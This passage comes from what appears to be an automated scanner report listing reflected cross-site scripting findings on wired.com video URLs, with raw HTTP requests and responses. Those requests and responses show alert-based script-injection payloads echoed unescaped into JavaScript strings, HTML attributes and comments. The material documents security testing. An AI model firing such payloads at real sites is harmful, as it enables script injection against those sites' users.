This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest5cf86"><a>178493caa5e/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:41:19 GMT
Date: Mon, 22 Nov 2010 00:36:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106723


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest5cf86"><a>178493caa5e">
...[SNIP]...

1.1096. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a45"-alert(1)-"19c3ad2c058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633e0a45"-alert(1)-"19c3ad2c058/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:33 GMT
Date: Mon, 22 Nov 2010 00:37:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
"text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","678922783001","cast-and-crew-talk-tron-reboot-secondskin-light-suits","1815816633e0a45"-alert(1)-"19c3ad2c058","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1097. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cdd5"-alert(1)-"cc78e87875d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits2cdd5"-alert(1)-"cc78e87875d/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=273
Expires: Mon, 22 Nov 2010 00:42:13 GMT
Date: Mon, 22 Nov 2010 00:37:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cast-and-crew-talk-tron-reboot-secondskin-light-suits2cdd5"-alert(1)-"cc78e87875d","latest-videos","latest","678922783001","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1098. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49409"-alert(1)-"d0e080d2a60 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/67892278300149409"-alert(1)-"d0e080d2a60 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:42:49 GMT
Date: Mon, 22 Nov 2010 00:38:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","67892278300149409"-alert(1)-"d0e080d2a60","cast-and-crew-talk-tron-reboot-secondskin-light-suits","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1099. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a16d4--><script>alert(1)</script>6939ec5827d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoa16d4--><script>alert(1)</script>6939ec5827d/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29487
Vary: Accept-Encoding
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:45:02 GMT
Date: Mon, 22 Nov 2010 00:40:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoa16d4--><script>alert(1)</script>6939ec5827d/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001
-->
...[SNIP]...

1.1100. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5ebd"><a>fbbbc1e6440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod5ebd"><a>fbbbc1e6440/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29448
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:56 GMT
Date: Mon, 22 Nov 2010 00:39:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod5ebd"><a>fbbbc1e6440 ss_latest-videos c_latest">
...[SNIP]...

1.1101. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6150c"><a>62255968c42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos6150c"><a>62255968c42/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:45:26 GMT
Date: Mon, 22 Nov 2010 00:40:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos6150c"><a>62255968c42 c_latest">
...[SNIP]...

1.1102. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45720"-alert(1)-"e14c5a60747 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos45720"-alert(1)-"e14c5a60747/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:28 GMT
Date: Mon, 22 Nov 2010 00:41:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","1815816633","latest-videos45720"-alert(1)-"e14c5a60747","656445394001","could-you-even-hear-anything-at-jon-stewarts-dc-rally","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1103. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeaa9"-alert(1)-"9d76291781f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latesteeaa9"-alert(1)-"9d76291781f/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:47:06 GMT
Date: Mon, 22 Nov 2010 00:42:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106828


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
"text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","1815816633","656445394001","could-you-even-hear-anything-at-jon-stewarts-dc-rally","latesteeaa9"-alert(1)-"9d76291781f","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1104. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1eea"><a>5becca496a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestd1eea"><a>5becca496a1/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:46:19 GMT
Date: Mon, 22 Nov 2010 00:41:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106794


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestd1eea"><a>5becca496a1">
...[SNIP]...

1.1105. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d7bf"-alert(1)-"d14a327ddc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/18158166332d7bf"-alert(1)-"d14a327ddc9/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:45 GMT
Date: Mon, 22 Nov 2010 00:42:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "18158166332d7bf"-alert(1)-"d14a327ddc9","latest-videos","latest","656445394001","could-you-even-hear-anything-at-jon-stewarts-dc-rally","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1106. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eec1"-alert(1)-"be3d8efd9a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally3eec1"-alert(1)-"be3d8efd9a6/656445394001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:56 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","could-you-even-hear-anything-at-jon-stewarts-dc-rally3eec1"-alert(1)-"be3d8efd9a6","1815816633","656445394001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1107. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b3e"-alert(1)-"f2dd299395f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001e8b3e"-alert(1)-"f2dd299395f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:09 GMT
Date: Mon, 22 Nov 2010 00:43:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","656445394001e8b3e"-alert(1)-"f2dd299395f","latest","1815816633","could-you-even-hear-anything-at-jon-stewarts-dc-rally","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1108. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

